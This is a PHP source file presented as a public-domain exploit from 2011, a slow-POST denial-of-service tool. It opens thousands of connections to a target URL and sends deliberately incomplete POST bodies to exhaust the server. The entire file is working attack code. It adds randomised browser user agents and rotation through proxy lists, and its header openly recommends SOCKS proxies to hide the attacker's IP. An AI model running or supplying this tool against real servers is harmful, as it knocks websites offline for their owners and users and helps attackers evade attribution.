<?php
/**
 * Exploit Title: SlowPOST.php - POST Denial-Of-Service [v0.8.2]
 *
 * Date:      18.05.2011
 * Author:    NewEraCracker
 * License:   Public Domain
 *
 * How to run:
 * Step 1: Open comand line
 * Step 2: php SlowPOST.php
 *
 * This exploit might expose your IP Address in server logs. Be aware.
 * Obviously, using a list of SOCKS5 is a good idea so... #infodox
 */

//-------------------------
// INiT
//-------------------------

// Define STDIN
if( !defined("STDIN") )
{
	define( "STDIN", fopen('php://stdin','r') );
}

// Define EXPLOIT_VERSION
if( !defined("EXPLOIT_VERSION") )
{
	define( "EXPLOIT_VERSION", "v0.8.2" );
}

// Check SAPI
if(PHP_SAPI != 'cli')
{
	echo "This script isn\'t meant to be ran via browser";
	exit(1);
}

//-------------------------
// FUNCTiONS
//-------------------------

// Checks if url is valid and returns true or false
function isValidTango($url)
{
	if ( strpos($url,'http://') === 0 ) return true;
	return false; 
}

// Read STDIN and return it
function readSTDIN()
{
	$file = STDIN;
	if(!$file) return false;
	$data = fgets($file);
	return rtrim($data);
}

// Receives a string and returns an array with url params
function getParamsFromUrl($url)
{
	$url = explode('/',$url,4);
	$url[2] = explode(':',$url[2],2);
	$url[2][1] = isset($url[2][1]) ? $url[2][1] : 80;

	$host = $url[2][0];
	$port = $url[2][1];
	$path = isset($url[3]) ? $url[3] : "";

	unset($url);

	$url = array('host' => $host, 'port' => $port, 'path' => $path);	
	return $url;
}

// Receive a file, give a proxy (returns false on failure)
function getRandomProxy($file)
{
	// Should work
	$file = str_replace("\\","/",$file);

	// Test the file
	if( !is_readable($file) ) return false;

	// Get the file with the proxies
	$proxies = file_get_contents($file);

	// Be sure of the line endings
	$proxies = str_replace( array("\r\n","\r"), "\n", $proxies);

	// Grab the proxies	
	$proxies = explode("\n",$proxies);
	foreach($proxies as $key => $value)
	{
		$proxies[$key] = explode(":",$value);
		
		if( isset($proxies[$key][0]) && isset($proxies[$key][1]) )
		{
			// This allows me to get proxies from lists like
			// IP:PORT bla bla bla
			$proxies[$key][1] = explode(" ",$proxies[$key][1]);
			$proxies[$key][1] = explode("\t",$proxies[$key][1][0]);
			$proxies[$key][1] = $proxies[$key][1][0];

			// The proxy
			$proxies[$key] = array('host' => $proxies[$key][0], 'port' => $proxies[$key][1]);
		}
		else
		{
			unset($proxies[$key]);
		}
	}
	unset($key,$value);

	// Give a random proxy
	$proxy = null;
	if( count($proxies) )
	{
		while( !$proxy )
		{
			$rand  = mt_rand(0,count($proxies)-1);
			$proxy = (isset($proxies[$rand]) ? $proxies[$rand] : null);
		}
	}

	// :D
	if( !$proxy )
		return false;
	else
	{
		return $proxy;
	}
}

// Returns a random useragent
function randomUserAgent()
{
	// Microsoft Windows versions
	$os = array("5.0","5.1","6.0","6.1");

	// Select a random windows
	$os = $os [ mt_rand(0,count($os)-1) ];

	// Select a random browser
	if( mt_rand(0,1) )
	{
		// Internet Explorer versions
		$ua[0] = array("4.0","7.0");
		$ua[1] = array("4.0","8.0");
		$ua[2] = array("5.0","9.0");

		// Random IE
		$ua = $ua [ mt_rand(0,count($ua)-1) ];
		return "Mozilla/{$ua[0]} (compatible; MSIE {$ua[1]}; Windows NT {$os}; Trident/{$ua[0]})";
	}
	else
	{
		// Mozilla Firefox languages
		$lang = array("en-GB","en-US","es-ES","pt-BR","pt-PT","sv-SE");

		// Mozilla Firefox versions
		$ua[0] = array("1.9.2.16","20110319","3.6.16");
		$ua[1] = array("1.9.2.17","20110420","3.6.17");

		// Random FF
		$ua = $ua [ mt_rand(0,count($ua)-1) ];
		$lang = $lang [ mt_rand(0,count($lang)-1) ];
		return "Mozilla/5.0 (Windows; U; Windows NT {$os}; {$lang}; rv:{$ua[0]}) Gecko/{$ua[1]} Firefox/{$ua[2]}";
	}
}

// Opens a custom socket and returns it
function openCustomSocket($host,$port)
{
		$fp = @fsockopen($host, $port, $errno, $errstr, 1);
		if (!$fp) return false;
		stream_set_blocking($fp,0);
		return $fp;
}

// Receives a socket and performs the start of a slowPost'ing
// Returns Content-Length on success and false on failure
function slowPostStart($sock,$host,$port,$path)
{
	// Check the socket
	if($sock)
	{
		// To fix Host header
		$host = ($port==80) ? $host : $host.":".$port;

		// Generate a random Content-Length
		$length = mt_rand(1337,31337);

		// Do it :D
		$out  = "POST /{$path} HTTP/1.1\r\n";
		$out .= "Host: {$host}\r\n";
		$out .= "User-Agent: ".randomUserAgent()."\r\n";
		$out .= "Accept: */*\r\n";
		$out .= "Accept-Encoding: gzip,deflate\r\n";
		$out .= "Keep-Alive: ".mt_rand(60,120)."\r\n";
		$out .= "Connection: Keep-Alive\r\n";
		$out .= "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n";
		$out .= mt_rand(0,1) ? "Referer: http://{$host}/\r\n" : "";
		$out .= "Content-Length: {$length}\r\n";
		$out .= "\r\n";
		@fwrite($sock, $out);
		return $length;
	}
	else
	{
		return false;
	}
}

// Receives a socket and continues the slowPost'ing
function slowPostContinue($sock,$bytes=5)
{
	// Check the $bytes
	if( intval($bytes) != $bytes ) $bytes=5;

	// Check the socket
	if($sock)
	{
		// Do it :D
		$out = "";
		for($j=0;$j<$bytes;$j++);
		{
			$out .= chr(mt_rand(33,126));
		}
		$out = urlencode($out);
		@fwrite($sock, $out);
		return true;
	}
	else
		return false;
}

//-------------------------
// MAiN CODE
//-------------------------

echo "
     _______. __        ______   ____    __    ____
    /       ||  |      /  __  \  \   \  /  \  /   /
   |   (----`|  |     |  |  |  |  \   \/    \/   /
    \   \    |  |     |  |  |  |   \            /
.----)   |   |  `----.|  `--'  |    \    /\    /
|_______/    |_______| \______/      \__/  \__/

.______     ______        _______.___________.
|   _  \   /  __  \      /       |           |
|  |_)  | |  |  |  |    |   (----`---|  |----`
|   ___/  |  |  |  |     \   \       |  |
|  |      |  `--'  | .----)   |      |  |
| _|       \______/  |_______/       |__|
";
echo PHP_EOL.EXPLOIT_VERSION." by NewEraCracker".PHP_EOL;

// Fetch the URL to attack
$url = null;
if( isset($_SERVER['argv'][1]) )
{
	$url = $_SERVER['argv'][1];
}
if ( !isValidTango($url) ) $url = null;

// Fetch proxy to use
$proxy['host'] = null;
$proxy['port'] = null;
$proxy['file'] = false;
if( !empty($url) && isset($_SERVER['argv'][2]) )
{
	if( $proxy = explode(":",$_SERVER['argv'][2]) )
	{
		if( isset($proxy[0]) && isset($proxy[1]) )
		{
			$proxy['host'] = $proxy[0];
			$proxy['port'] = $proxy[1];
			unset($proxy[0],$proxy[1]);
		}
	}
	if( !( isset($proxy['host']) && isset($proxy['port']) ) && is_readable($_SERVER['argv'][2]) )
	{
		$proxy['file'] = true;
		$proxy['filename'] = $_SERVER['argv'][2];
	}
}

// Ask for proxy
if( empty($url) && ( empty($proxy['host']) || empty($proxy['port']) ) && !$proxy['file'] )
{
	$proxy['use'] = null;
	while( !$proxy['use'] )
	{
		echo PHP_EOL."Do you want to use a proxy [yes/no/file]: ";
		$proxy['use'] = readSTDIN();

		if( strpos(strtolower($proxy['use']),'y') === 0 )
		{
			echo PHP_EOL."Proxy IP: ";
			$proxy['host'] = readSTDIN();
			echo PHP_EOL."Proxy Port: ";
			$proxy['port'] = readSTDIN();
		}
		elseif( strpos(strtolower($proxy['use']),'n') === 0 )
		{
			break;
		}
		elseif( strpos(strtolower($proxy['use']),'f') === 0 )
		{
			echo PHP_EOL."Proxy file: ";
			$proxy['filename'] = readSTDIN();	

			if( is_readable($proxy['filename']) )
			{
				$proxy['file'] = true;
			}
			else
			{
				echo PHP_EOL."Invalid file!".PHP_EOL;	
				$proxy['use'] = null;
			}
		}
		else
		{
			$proxy['use'] = null;
			echo PHP_EOL."Invalid choice!".PHP_EOL;	
		}
	}
	unset($proxy['use']);
}

// Ask for target URL
while( !$url )
{
	echo PHP_EOL."Target url: ";
	$url = readSTDIN();

	if( isValidTango($url) ) break;

	$url = null;
	echo PHP_EOL."Invalid target!".PHP_EOL;
}

// Init
@ini_set("default_socket_timeout",1);
$url = getParamsFromUrl($url);
$proxy['host'] = (!$proxy['host']) ? $url['host'] : $proxy['host'];
$proxy['port'] = (!$proxy['port']) ? $url['port'] : $proxy['port'];
echo PHP_EOL."IMMA FIRIN MAH LAZOR!".PHP_EOL;

// Do it
while(true)
{
	$fp = array();

	// Start
	for($i=0;$i<5000;$i++)
	{
		// Using Proxy file?
		if( $proxy['file'] )
		{
			$filename = $proxy['filename'];
			$proxy = getRandomProxy($filename);
			if(!$proxy)
			{
				echo $filename." is not a valid proxy-list file!";
				exit(1);
			}
			$proxy['filename'] = $filename;
		}
	
		// Open a new socket
		if( $fp[$i]['sock'] = openCustomSocket($proxy['host'], $proxy['port']) )
		{
			// Progress bar?
			echo '+';

			// Start a new slowPost
			if( $_length = slowPostStart($fp[$i]['sock'], $url['host'], $url['port'], $url['path']))
			{
				// Find the lenght
				if( !isset($fp[$i]['length']) )
				{
					$fp[$i]['length'] = $_length;
				}
			}
			else
			{
				// Epic fail?
				@fclose($fp[$i]['sock']);
				unset($fp[$i]);
			}
		}
		else
		{
			// Epic fail?
			@fclose($fp[$i]['sock']);
			unset($fp[$i]);
		}

		// Check the current sockets
		foreach($fp as $_k => $_v)
		{
			if($fp[$_k]['length'] > 0)
			{
				// Contine old slowPosts
				$_length = ($fp[$_k]['length'] < 5) ? $fp[$_k]['length'] : 5; 
				slowPostContinue($fp[$_k]['sock'],$_length);
				$fp[$_k]['length'] = $fp[$_k]['length']-$_length;
			}
			else
			{
				// Close completed slowPosts
				@fclose($fp[$_k]['sock']);
				unset($fp[$_k]);
			}
		}
		unset($_k,$_v);
	}

	// Restart
	foreach($fp as $_k => $_v)
	{
		@fclose($fp[$_k]['sock']);
	}
}